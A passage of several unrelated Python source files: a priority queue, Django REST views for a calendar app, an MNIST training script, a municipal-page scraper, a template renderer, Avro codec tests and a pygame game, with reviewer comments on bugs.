        """Remove and return the smallest item; raises when empty."""
        if len(self._data) == 0: raise Exception('queue empty !! unable to pop')
        ret = heapq.heappop(self._data)[2]
        if len(self._data) == 0: self.empty = True
        return ret
    def top(self):
        """Return (without removing) the smallest item; raises when empty.

        O(1): reads the heap root directly instead of the original
        pop-then-push round trip (which also re-evaluated the key).
        """
        if len(self._data) == 0: raise Exception('queue empty !! unable to top')
        return self._data[0][2]
    def __len__(self):
        return len(self._data)
    def __str__(self):
        # Items in heap (arbitrary) order, like the original representation.
        return [entry[2] for entry in self._data].__str__()
|
from rest_framework import generics, status
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response

from .models import BusinessUnit, Location, Role, User, Manager, Calendar, Event, CalendarSharing, Invitation
# NOTE(review): the *Serializer classes referenced below are never imported
# in this module — likely `from .serializers import ...`; confirm the path.
#BusinessUnit retrieve API view
class BusinessUnitRetrieveAPIView(generics.RetrieveAPIView):
    """Retrieve a single BusinessUnit by pk; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = BusinessUnitSerializer
    def get_queryset(self):
        # Unfiltered; DRF selects the instance from the URL kwarg.
        return BusinessUnit.objects.all()
#BusinessUnit list API view
class BusinessUnitListAPIView(generics.ListAPIView):
    """List all BusinessUnits; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = BusinessUnitSerializer
    def get_queryset(self):
        return BusinessUnit.objects.all()
#BusinessUnit update API view
class BusinessUnitUpdateAPIView(generics.UpdateAPIView):
    """Partial update via PUT; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = BusinessUnitSerializer
    def put(self, request, *args, **kwargs):
        # NOTE(review): the serializer is bound to request.user, not to a
        # BusinessUnit instance — looks copied from a user-update view;
        # confirm the intended update target.
        serializer_data = request.data
        serializer = BusinessUnitSerializer(
            request.user, data=serializer_data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
#Location retrieve API view
class LocationRetrieveAPIView(generics.RetrieveAPIView):
    """Retrieve a single Location by pk; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = LocationSerializer
    def get_queryset(self):
        # Unfiltered; DRF selects the instance from the URL kwarg.
        return Location.objects.all()
#Location list API view
class LocationListAPIView(generics.ListAPIView):
    """List all Locations; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = LocationSerializer
    def get_queryset(self):
        return Location.objects.all()
#Location update API view
class LocationUpdateAPIView(generics.UpdateAPIView):
    """Partial update via PUT; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = LocationSerializer
    def put(self, request, *args, **kwargs):
        # NOTE(review): binds the serializer to request.user, not to a
        # Location instance — confirm the intended update target.
        serializer_data = request.data
        serializer = LocationSerializer(
            request.user, data=serializer_data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
#Role retrieve API view
class RoleRetrieveAPIView(generics.RetrieveAPIView):
    """Retrieve a single Role by pk; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = RoleSerializer
    def get_queryset(self):
        # Unfiltered; DRF selects the instance from the URL kwarg.
        return Role.objects.all()
#Role list API view
class RoleListAPIView(generics.ListAPIView):
    """List all Roles; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = RoleSerializer
    def get_queryset(self):
        return Role.objects.all()
#Role update API view
class RoleUpdateAPIView(generics.UpdateAPIView):
    """Partial update via PUT; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = RoleSerializer
    def put(self, request, *args, **kwargs):
        # NOTE(review): binds the serializer to request.user, not to a
        # Role instance — confirm the intended update target.
        serializer_data = request.data
        serializer = RoleSerializer(
            request.user, data=serializer_data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
#User retrieve API view
class UserRetrieveAPIView(generics.RetrieveAPIView):
    """Retrieve a single User by pk; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = UserSerializer
    def get_queryset(self):
        # Unfiltered; DRF selects the instance from the URL kwarg.
        return User.objects.all()
#User list API view
class UserListAPIView(generics.ListAPIView):
    """List all Users; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = UserSerializer
    def get_queryset(self):
        return User.objects.all()
#User update API view
class UserUpdateAPIView(generics.UpdateAPIView):
    """Partial update of the requesting user via PUT; authenticated only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = UserSerializer
    def put(self, request, *args, **kwargs):
        # Here request.user IS the natural target instance (unlike the
        # sibling update views, which copy this pattern for other models).
        serializer_data = request.data
        serializer = UserSerializer(
            request.user, data=serializer_data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
#Manager retrieve API view
class ManagerRetrieveAPIView(generics.RetrieveAPIView):
    """Retrieve a single Manager by pk; authenticated users only."""
    permission_classes = (IsAuthenticated,)
    serializer_class = ManagerSerializer
    def get_queryset(self):
        # Unfiltered; DRF selects the instance from the URL kwarg.
        return Manager.objects.all()
#Manager list API view
class ManagerListAPIView(generics.ListAPIView):
    """List all Managers; authentication required."""

    serializer_class = ManagerSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every Manager is visible to this view."""
        return Manager.objects.all()
#Manager update API view
class ManagerUpdateAPIView(generics.UpdateAPIView):
    """Partially update the Manager addressed by the URL (PUT acts like PATCH)."""

    permission_classes = (IsAuthenticated,)
    serializer_class = ManagerSerializer
    # get_object() needs a queryset to resolve the URL pk against.
    queryset = Manager.objects.all()

    def put(self, request, *args, **kwargs):
        # BUG FIX: the serializer was previously bound to ``request.user``,
        # so a PUT mutated the authenticated user instead of the targeted
        # Manager. Bind it to the object resolved from the URL instead.
        serializer = ManagerSerializer(
            self.get_object(), data=request.data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
#Calendar retrieve API view
class CalendarRetrieveAPIView(generics.RetrieveAPIView):
    """Return a single Calendar; authentication required."""

    serializer_class = CalendarSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every Calendar is visible to this view."""
        return Calendar.objects.all()
#Calendar list API view
class CalendarListAPIView(generics.ListAPIView):
    """List all Calendars; authentication required."""

    serializer_class = CalendarSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every Calendar is visible to this view."""
        return Calendar.objects.all()
#Calendar update API view
class CalendarUpdateAPIView(generics.UpdateAPIView):
    """Partially update the Calendar addressed by the URL (PUT acts like PATCH)."""

    permission_classes = (IsAuthenticated,)
    serializer_class = CalendarSerializer
    # get_object() needs a queryset to resolve the URL pk against.
    queryset = Calendar.objects.all()

    def put(self, request, *args, **kwargs):
        # BUG FIX: the serializer was previously bound to ``request.user``,
        # so a PUT mutated the authenticated user instead of the targeted
        # Calendar. Bind it to the object resolved from the URL instead.
        serializer = CalendarSerializer(
            self.get_object(), data=request.data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
#Event retrieve API view
class EventRetrieveAPIView(generics.RetrieveAPIView):
    """Return a single Event; authentication required."""

    serializer_class = EventSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every Event is visible to this view."""
        return Event.objects.all()
#Event list API view
class EventListAPIView(generics.ListAPIView):
    """List all Events; authentication required."""

    serializer_class = EventSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every Event is visible to this view."""
        return Event.objects.all()
#Event update API view
class EventUpdateAPIView(generics.UpdateAPIView):
    """Partially update the Event addressed by the URL (PUT acts like PATCH)."""

    permission_classes = (IsAuthenticated,)
    serializer_class = EventSerializer
    # get_object() needs a queryset to resolve the URL pk against.
    queryset = Event.objects.all()

    def put(self, request, *args, **kwargs):
        # BUG FIX: the serializer was previously bound to ``request.user``,
        # so a PUT mutated the authenticated user instead of the targeted
        # Event. Bind it to the object resolved from the URL instead.
        serializer = EventSerializer(
            self.get_object(), data=request.data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
#CalendarSharing retrieve API view
class CalendarSharingRetrieveAPIView(generics.RetrieveAPIView):
    """Return a single CalendarSharing record; authentication required."""

    serializer_class = CalendarSharingSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every CalendarSharing record is visible to this view."""
        return CalendarSharing.objects.all()
#CalendarSharing list API view
class CalendarSharingListAPIView(generics.ListAPIView):
    """List all CalendarSharing records; authentication required."""

    serializer_class = CalendarSharingSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every CalendarSharing record is visible to this view."""
        return CalendarSharing.objects.all()
#CalendarSharing update API view
class CalendarSharingUpdateAPIView(generics.UpdateAPIView):
    """Partially update the CalendarSharing addressed by the URL (PUT acts like PATCH)."""

    permission_classes = (IsAuthenticated,)
    serializer_class = CalendarSharingSerializer
    # get_object() needs a queryset to resolve the URL pk against.
    queryset = CalendarSharing.objects.all()

    def put(self, request, *args, **kwargs):
        # BUG FIX: the serializer was previously bound to ``request.user``,
        # so a PUT mutated the authenticated user instead of the targeted
        # CalendarSharing. Bind it to the object resolved from the URL.
        serializer = CalendarSharingSerializer(
            self.get_object(), data=request.data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
#Invitation retrieve API view
class InvitationRetrieveAPIView(generics.RetrieveAPIView):
    """Return a single Invitation; authentication required."""

    serializer_class = InvitationSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every Invitation is visible to this view."""
        return Invitation.objects.all()
#Invitation list API view
class InvitationListAPIView(generics.ListAPIView):
    """List all Invitations; authentication required."""

    serializer_class = InvitationSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Every Invitation is visible to this view."""
        return Invitation.objects.all()
#Invitation update API view
class InvitationUpdateAPIView(generics.UpdateAPIView):
    """Partially update the Invitation addressed by the URL (PUT acts like PATCH)."""

    permission_classes = (IsAuthenticated,)
    serializer_class = InvitationSerializer
    # get_object() needs a queryset to resolve the URL pk against.
    queryset = Invitation.objects.all()

    def put(self, request, *args, **kwargs):
        # BUG FIX: the serializer was previously bound to ``request.user``,
        # so a PUT mutated the authenticated user instead of the targeted
        # Invitation. Bind it to the object resolved from the URL instead.
        serializer = InvitationSerializer(
            self.get_object(), data=request.data, partial=True
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
|
import torch
from torch import nn,optim
from torch.nn import functional
from torchvision import datasets,transforms
class trainer:
    """Minimal training harness for the MNIST ``basicConv`` model."""

    def __init__(self):
        # Data, model, criterion and optimizer with fixed hyper-parameters
        # (batch size 32, SGD lr=0.001, momentum=0.9).
        self.train_loader, self.test_loader = dataloaders(batch_size=32)
        self.model = basicConv()
        self.loss_func = nn.CrossEntropyLoss()
        self.optimizer = optim.SGD(self.model.parameters(), lr=0.001, momentum=0.9)
        self.epoch = 0
        self.train_loss_history = []

    def train_iter(self, data):
        """Run one optimization step.

        ``data`` is a ``[inputs, labels]`` pair as yielded by the loader.
        Returns the loss tensor for this batch.
        """
        inputs, labels = data
        # Zero the parameter gradients before the new backward pass.
        self.optimizer.zero_grad()
        outputs = self.model(inputs)
        # BUG FIX: the loss was previously computed as
        # ``self.model(outputs, labels)``, which re-invoked the network
        # (and would raise, since forward takes one argument) instead of
        # applying the criterion.
        loss = self.loss_func(outputs, labels)
        loss.backward()
        self.optimizer.step()
        return loss

    def validate(self):
        """Placeholder for evaluation on ``self.test_loader``."""
        pass

    def train_epoch(self):
        """Train over the full loader once; return the summed epoch loss."""
        self.epoch += 1
        running_loss = 0.0
        for data in self.train_loader:
            # ``.item()`` detaches the scalar so autograd graphs are not
            # retained across iterations while accumulating.
            running_loss += self.train_iter(data).item()
        self.train_loss_history.append(running_loss)
        return running_loss
def dataloaders(loc='../data', batch_size=1, shuffle=True):
    """Build MNIST train/test DataLoaders (downloads the train set if absent).

    The test loader is never shuffled; ``shuffle`` applies to training only.
    """
    mnist_transform = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((0.1307,), (0.3081,)),
    ])
    train_set = datasets.MNIST(loc, train=True, download=True,
                               transform=mnist_transform)
    test_set = datasets.MNIST(loc, train=False, transform=mnist_transform)
    train_loader = torch.utils.data.DataLoader(
        train_set, batch_size=batch_size, shuffle=shuffle)
    test_loader = torch.utils.data.DataLoader(
        test_set, batch_size=batch_size, shuffle=False)
    return train_loader, test_loader
class basicConv(nn.Module):
    """Small two-conv CNN for 28x28 single-channel images, 10 output classes."""

    def __init__(self):
        super(basicConv, self).__init__()
        self.conv1 = nn.Conv2d(1, 32, 3, 1)
        self.conv2 = nn.Conv2d(32, 64, 3, 1)
        self.dropout1 = nn.Dropout2d(0.25)
        self.dropout2 = nn.Dropout2d(0.5)
        self.fc1 = nn.Linear(9216, 128)  # 64 channels * 12 * 12 after pooling
        self.fc2 = nn.Linear(128, 10)

    def forward(self, x):
        """Return per-class log-probabilities for a batch of images."""
        hidden = functional.relu(self.conv1(x))
        hidden = functional.max_pool2d(self.conv2(hidden), 2)
        hidden = torch.flatten(self.dropout1(hidden), 1)
        hidden = functional.relu(self.fc1(hidden))
        hidden = self.dropout2(hidden)
        return functional.log_softmax(self.fc2(hidden), dim=1)
import csv
import requests
from lxml import html
# Fetch the Ontario Ministry of Municipal Affairs municipality listing page.
page = requests.get('http://www.mah.gov.on.ca/page1591.aspx')
tree = html.fromstring(page.content)
# Municipality display names: anchor text from the first table column,
# keeping only anchors whose href contains "h" -- presumably to skip
# placeholder anchors without a real link; confirm against the live page.
muni_names = tree.xpath(
    '//*[@id="content"]/div/table/tbody[2]/tr/td[1]/p/a[contains(@href, "h")]/text()'
)
# Corresponding municipality page URLs from the same table column.
muni_urls = tree.xpath(
    '//*[@id="content"]/div/table/tbody[2]/tr/td[1]/p/a/@href'
)
# Placeholders for data to be scraped later; not populated in this script.
muni_geo = None
muni_phone = None
# Sanity check: the two XPath queries should return equal-length lists,
# otherwise names and URLs get mis-paired by zip() below.
print(len(muni_names))
print(len(muni_urls))
muni_data = list(zip(muni_names, muni_urls))
print(muni_data[-5:])
|
import logging
from glob import glob
from jinjafy import Jinjafier
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    template = "project.md"
    # Collect shared/default metadata files; ``*.ymd`` appears to be this
    # project's own metadata extension alongside plain YAML -- confirm
    # against the jinjafy package.
    default_meta = glob("data/meta/*.ymd") + glob("./data/meta/*.yaml")
    meta = "data/projects/merck.uldir.ymd"
    j = Jinjafier(template, default_meta=default_meta)
    # Render the project-specific metadata against the template and log it.
    o = j.render(meta)
    logging.debug(o)
|
import io
import avroc.codegen.read
import avroc.codegen.write
import fastavro.write
import fastavro.read
import fastavro._read
import pytest
import decimal
import datetime
import uuid
class testcase:
    """A schema plus example messages, checked against fastavro as the oracle."""

    def __init__(self, label, schema, message=None, message_list=None):
        self.label = label
        self.schema = schema
        # Either a list of messages, a single message, or both (the single
        # message is appended to the provided list).
        self.messages = message_list if message_list is not None else []
        if message is not None:
            self.messages.append(message)

    def assert_reader(self):
        """Encode each message with fastavro, decode with the compiled reader, compare."""
        many = len(self.messages) > 1
        for idx, msg in enumerate(self.messages):
            buf = io.BytesIO()
            fastavro.write.schemaless_writer(buf, self.schema, msg)
            buf.seek(0)
            compiled_reader = avroc.codegen.read.ReaderCompiler(self.schema).compile()
            decoded = compiled_reader(buf)
            if many:
                assert decoded == msg, f"reader behavior mismatch for message idx={idx}"
            else:
                assert decoded == msg, "reader behavior mismatch"

    def assert_writer(self):
        """Check the compiled writer round-trips and matches fastavro's bytes."""
        many = len(self.messages) > 1
        for idx, msg in enumerate(self.messages):
            compiled_writer = avroc.codegen.write.WriterCompiler(self.schema).compile()
            encoded = compiled_writer(msg)
            # Round-trip through fastavro's reader first.
            decoded = fastavro.read.schemaless_reader(
                io.BytesIO(encoded), self.schema
            )
            assert decoded == msg
            # Then require byte-identical output to fastavro's encoding.
            reference = io.BytesIO()
            fastavro.write.schemaless_writer(reference, self.schema, msg)
            canonical_encoding = reference.getvalue()
            if many:
                assert (
                    encoded == canonical_encoding
                ), f"writer byte output mismatch for message idx={idx}"
            else:
                assert encoded == canonical_encoding, "writer byte output mismatch"
testcases = [
testcase(
label="large record",
schema={
"type": "record",
"name": "Record",
"fields": [
# Primitive types
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
{"type": "long", "name": "long_field"},
{"type": "float", "name": "float_field"},
{"type": "double", "name": "double_field"},
{"type": "boolean", "name": "boolean_field"},
{"type": "bytes", "name": "bytes_field"},
{"type": "null", "name": "null_field"},
# Array types
{
"name": "array_of_primitives",
"type": {
"type": "array",
"items": "int",
},
},
{
"name": "array_of_records",
"type": {
"type": "array",
"items": {
"type": "record",
"name": "ArrayItem",
"fields": [{"name": "array_item_field", "type": "string"}],
},
},
},
{
"name": "array_of_records_with_arrays",
"type": {
"type": "array",
"items": {
"type": "record",
"name": "ArrayItemWithSubarray",
"fields": [
{
"name": "subarray",
"type": {
"type": "array",
"items": "int",
},
},
],
},
},
},
{
"name": "array_of_maps",
"type": {
"type": "array",
"items": {"type": "map", "values": "boolean"},
},
},
# Maps
{"name": "map_of_primitives", "type": {"type": "map", "values": "int"}},
{
"name": "map_of_arrays",
"type": {
"type": "map",
"values": {"type": "array", "items": "int"},
},
},
{
"name": "map_of_records",
"type": {
"type": "map",
"values": {
"type": "record",
"name": "MapItem",
"fields": [{"name": "intval", "type": "int"}],
},
},
},
# Unions
{"name": "union", "type": ["int", "boolean"]},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"long_field": 2,
"float_field": 3.0,
"double_field": -4.0,
"boolean_field": True,
"bytes_field": b"bytes_value",
"null_field": None,
"array_of_primitives": [5, 6, 7],
"array_of_records": [
{"array_item_field": "s1"},
{"array_item_field": "s2"},
],
"array_of_records_with_arrays": [
{"subarray": [8, 9]},
{"subarray": [10, 11]},
],
"array_of_maps": [
{"k1": True, "k2": False},
{"k3": False},
{"k4": True, "k5": True},
],
"map_of_primitives": {"k6": 1, "k7": 2},
"map_of_arrays": {"k8": [3, 4, 5], "k9": []},
"map_of_records": {"k10": {"intval": 6}},
"union": True,
},
),
testcase(
label="primitive record",
schema={
"type": "record",
"name": "Record",
"fields": [
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
{"type": "long", "name": "long_field"},
{"type": "float", "name": "float_field"},
{"type": "double", "name": "double_field"},
{"type": "boolean", "name": "boolean_field"},
{"type": "bytes", "name": "bytes_field"},
{"type": "null", "name": "null_field"},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"long_field": 2,
"float_field": 3.0,
"double_field": -4.0,
"boolean_field": True,
"bytes_field": b"bytes_value",
"null_field": None,
},
),
testcase(
label="nested primitive record",
schema={
"type": "record",
"name": "Parent",
"fields": [
{
"name": "child_field",
"type": {
"type": "record",
"name": "Child",
"fields": [
{"type": "string", "name": "child_string_field"},
{"type": "int", "name": "child_int_field"},
],
},
},
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"child_field": {
"child_string_field": "child_sting_value",
"child_int_field": 2,
},
},
),
testcase(
label="name collisions in nested record",
schema={
"type": "record",
"name": "Parent",
"fields": [
{
"name": "child_field",
"type": {
"type": "record",
"name": "Child",
"fields": [
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
],
},
},
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"child_field": {
"string_field": "child_sting_value",
"int_field": 2,
},
},
),
testcase(
label="indirect primitive typename",
schema={
"type": "record",
"name": "Record",
"fields": [
{"type": {"type": "string"}, "name": "string_field"},
{"type": {"type": "int"}, "name": "int_field"},
{"type": {"type": "long"}, "name": "long_field"},
{"type": {"type": "float"}, "name": "float_field"},
{"type": {"type": "double"}, "name": "double_field"},
{"type": {"type": "boolean"}, "name": "boolean_field"},
{"type": {"type": "bytes"}, "name": "bytes_field"},
{"type": {"type": "null"}, "name": "null_field"},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"long_field": 2,
"float_field": 3.0,
"double_field": -4.0,
"boolean_field": True,
"bytes_field": b"bytes_value",
"null_field": None,
},
),
testcase(
label="union_primitives",
schema={
"type": "record",
"name": "Record",
"fields": [
{
"name": "field",
"type": ["string", "long", "null", "boolean", "float"],
},
],
},
message_list=[{"field": v} for v in ("string_val", 1, None, True, 0.5)],
),
testcase(
label="map of primitives",
schema={"type": "map", "values": "int"},
message={"key1": 1, "key2": 2, "key3": 3},
),
testcase(
label="map of arrays",
schema={"type": "map", "values": {"type": "array", "items": "int"}},
message={"k8": [3, 4, 5], "k9": []},
),
testcase(
label="map of records",
schema={
"type": "map",
"values": {
"type": "record",
"name": "item",
"fields": [{"type": "int", "name": "intval"}],
},
},
message={"k10": {"intval": 6}},
),
testcase(
label="array of primitives",
schema={"type": "array", "items": "int"},
message=[1, 2, 3],
),
testcase(
label="array of records",
schema={
"type": "array",
"items": {
"type": "record",
"name": "ArrayItem",
"fields": [{"name": "array_item_field", "type": "string"}],
},
},
message=[
{"array_item_field": "s1"},
{"array_item_field": "s2"},
],
),
testcase(
label="array of records with arrays",
schema={
"type": "array",
"items": {
"type": "record",
"name": "ArrayItemWithSubarray",
"fields": [
{
"name": "subarray",
"type": {
"type": "array",
"items": "int",
},
},
],
},
},
message=[
{"subarray": [8, 9]},
{"subarray": [10, 11]},
],
),
testcase(
label="array of maps",
schema={
"type": "array",
"items": {"type": "map", "values": "boolean"},
},
message=[
{"k1": True, "k2": False},
{"k3": False},
{"k4": True, "k5": True},
],
),
testcase(
label="union",
schema=["int", "string"],
message="stringval",
),
testcase(
label="union of double",
schema=["null", "double"],
message=1.123,
),
testcase(
label="union of records",
schema={
"type": "record",
"name": "Record",
"fields": [
{
"name": "field",
"type": [
"null",
{
"type": "record",
"name": "subfield",
"fields": [{"type": "string", "name": "string_val"}],
},
],
},
],
},
message_list=[{"field": v} for v in [None, {"string_val": "abcd"}]],
),
testcase(
label="union of everything",
schema=[
"int",
"long",
"null",
"boolean",
"float",
"bytes",
"string",
{"type": "array", "items": "int"},
],
message_list=[
1,
1 << 40,
-1 << 40,
None,
False,
True,
0.0,
1.5,
b"",
b"bytes",
"",
"stringval",
[1, 2, 3],
b"123",
],
),
testcase(
label="union of fixed",
schema=[
{"type": "fixed", "size": 3, "name": "three_byte"},
{"type": "fixed", "size": 5, "name": "five_byte"},
],
message_list=[
b"123",
b"12345",
],
),
testcase(
label="union of logicals",
schema=[
{"type": "bytes", "logicalType": "decimal", "precision": 5, "scale": 4},
{"type": "string", "logicalType": "uuid"},
{"type": "int", "logicalType": "date"},
],
message_list=[
decimal.Decimal("3.1415"),
uuid.UUID("f81d4fae-7dec-11d0-a765-00a0c91e6bf6"),
datetime.date(2021, 2, 11),
],
),
testcase(label="optional", schema=["null", "int"], message_list=[1, None]),
testcase(
label="backwards optional", schema=["int", "null"], message_list=[1, None]
),
testcase(
label="toplevel primitive",
schema="int",
message=42,
),
testcase(
label="enum",
schema={"type": "enum", "name": "Foo", "symbols": ["A", "B", "C", "D"]},
message="C",
),
testcase(
label="fixed",
schema={"type": "fixed", "name": "md5", "size": 16},
message=b"1234567812345678",
),
testcase(
label="logical decimal",
schema={"type": "bytes", "logicalType": "decimal", "precision": 5, "scale": 4},
message=decimal.Decimal("3.1415"),
),
testcase(
label="logical decimal under precision",
schema={"type": "bytes", "logicalType": "decimal", "precision": 5, "scale": 2},
message=decimal.Decimal("3.14"),
),
testcase(
label="logical decimal positive exponent",
schema={"type": "bytes", "logicalType": "decimal", "precision": 5, "scale": 0},
message=decimal.Decimal("1.2345e20"),
),
testcase(
label="logical fixed decimal",
schema={
"type": "fixed",
"logicalType": "decimal",
"precision": 5,
"scale": 4,
"size": 6,
"name": "fixed_decimal",
},
message=decimal.Decimal("3.1415"),
),
testcase(
label="logical decimal without scale",
schema={"type": "bytes", "logicalType": "decimal", "precision": 4},
message=decimal.Decimal("1415"),
),
testcase(
label="logical decimal with unexpected type",
schema={"type": "string", "logicalType": "decimal"},
message="1.23",
),
testcase(
label="logical uuid",
schema={"type": "string", "logicalType": "uuid"},
message=uuid.UUID("f81d4fae-7dec-11d0-a765-00a0c91e6bf6"),
),
testcase(
label="logical uuid with unexpected type",
schema={"type": "int", "logicalType": "uuid"},
message=1,
),
testcase(
label="logical date",
schema={"type": "int", "logicalType": "date"},
message=datetime.date(2021, 2, 11),
),
testcase(
label="logical date with unexpected type",
schema={"type": "string", "logicalType": "date"},
message="hello",
),
testcase(
label="logical time-millis",
schema={"type": "int", "logicalType": "time-millis"},
message=datetime.time(12, 3, 4, 5000),
),
testcase(
label="logical time-millis with unexpected type",
schema={"type": "string", "logicalType": "time-millis"},
message="hello",
),
testcase(
label="logical time-micros",
schema={"type": "long", "logicalType": "time-micros"},
message=datetime.time(12, 3, 4, 5),
),
testcase(
label="logical time-micros with unexpected type",
schema={"type": "string", "logicalType": "time-micros"},
message="hello",
),
testcase(
label="logical timestamp-millis",
schema={"type": "long", "logicalType": "timestamp-millis"},
message=datetime.datetime(
2001, 2, 3, 4, 5, 6, 7000, tzinfo=datetime.timezone.utc
),
),
testcase(
label="logical timestamp-millis with unexpected type",
schema={"type": "string", "logicalType": "timestamp-millis"},
message="hello",
),
testcase(
label="logical timestamp-micros",
schema={"type": "long", "logicalType": "timestamp-micros"},
message=datetime.datetime(2001, 2, 3, 4, 5, 6, 7, tzinfo=datetime.timezone.utc),
),
testcase(
label="logical timestamp-micros with unexpected type",
schema={"type": "string", "logicalType": "timestamp-micros"},
message="hello",
),
testcase(
label="unknown logical type",
schema={"type": "string", "logicalType": "made-up"},
message="hello",
),
testcase(
label="recursive record",
schema={
"type": "record",
"name": "LinkedListNode",
"fields": [
{"name": "value", "type": "string"},
{"name": "next", "type": ["null", "LinkedListNode"]},
],
},
message={
"value": "a",
"next": {"value": "b", "next": {"value": "c", "next": None}},
},
),
testcase(
label="embedded recursion record",
schema={
"type": "record",
"name": "Wrapper",
"fields": [
{
"name": "list",
"type": {
"type": "record",
"name": "LinkedListNode",
"fields": [
{"name": "value", "type": "string"},
{"name": "next", "type": ["null", "LinkedListNode"]},
],
},
},
{"name": "outer", "type": "int"},
],
},
message={
"outer": 1,
"list": {
"value": "a",
"next": {"value": "b", "next": {"value": "c", "next": None}},
},
},
),
testcase(
label="nested recursion",
schema={
"type": "record",
"name": "Outer",
"fields": [
{
"name": "outer2middle",
"type": {
"name": "Middle",
"type": "record",
"fields": [
{
"name": "middle2inner",
"type": {
"name": "Inner",
"type": "record",
"fields": [
{
"name": "inner2outer",
"type": ["null", "Outer"],
},
{
"name": "inner2middle",
"type": ["null", "Middle"],
},
],
},
},
{
"name": "middle2outer",
"type": ["null", "Outer"],
},
],
},
},
{"name": "outer2inner", "type": ["null", "Inner"]},
],
},
message={
"outer2middle": {
"middle2inner": {
"inner2outer": {
"outer2middle": {
"middle2inner": {
"inner2outer": None,
"inner2middle": None,
},
"middle2outer": None,
},
"outer2inner": None,
},
"inner2middle": {
"middle2inner": {
"inner2outer": None,
"inner2middle": None,
},
"middle2outer": None,
},
},
"middle2outer": None,
},
"outer2inner": None,
},
),
]
@pytest.mark.parametrize("case", testcases, ids=[tc.label for tc in testcases])
def test_ast_compiled_reader(case):
    """Each fixture decodes correctly through the compiled reader."""
    case.assert_reader()
@pytest.mark.parametrize("case", testcases, ids=[tc.label for tc in testcases])
def test_ast_compiled_writer(case):
    """Each fixture encodes byte-identically through the compiled writer."""
    case.assert_writer()
def test_ast_compiler_enum_with_default():
    """An unknown enum symbol resolves to the reader schema's default.

    The writer schema has symbols A..E while the reader only knows A..C;
    reading "E" must fall back to the reader's declared default "A".
    """
    writer_schema = {
        "type": "enum",
        "name": "Foo",
        "symbols": ["A", "B", "C", "D", "E"],
        "default": "A",
    }
    reader_schema = {
        "type": "enum",
        "name": "Foo",
        "symbols": ["A", "B", "C"],
        "default": "A",
    }
    # "E" exists only in the writer schema.
    message = "E"
    message_encoded = io.BytesIO()
    fastavro.write.schemaless_writer(message_encoded, writer_schema, message)
    message_encoded.seek(0)
    c = avroc.codegen.read.ReaderCompiler(reader_schema)
    reader = c.compile()
    have = reader(message_encoded)
    assert have == "A"
|
import sys
from time import sleep
import pygame
from random import randint
from bullet import Bullet
from Rectangle import Rectangle
def fire_bullet(ai_settings, screen, ship, bullets):
    """Fire a bullet if the bullet limit has not been reached yet."""
    # Create a new bullet and add it to the ``bullets`` sprite group.
    if len(bullets) < ai_settings.bullets_allowed:
        new_bullet = Bullet(ai_settings, screen, ship)
        bullets.add(new_bullet)
def check_keydown_events(event, ai_settings, screen, ship, bullets):
    """Respond to key presses."""
    if event.key == pygame.K_DOWN:
        ship.moving_down = True
    elif event.key == pygame.K_UP:
        ship.moving_up = True
    elif event.key == pygame.K_SPACE:
        fire_bullet(ai_settings, screen, ship, bullets)
    elif event.key == pygame.K_q:
        # 'q' quits the game immediately.
        sys.exit()
def check_keyup_events(event, ai_settings, screen, stats, ship,
                       rect, bullets):
    """Respond to key releases."""
    if event.key == pygame.K_DOWN:
        ship.moving_down = False
    elif event.key == pygame.K_UP:
        ship.moving_up = False
    elif event.key == pygame.K_p and not stats.game_active:
        # 'p' starts a new game, but only while no game is running.
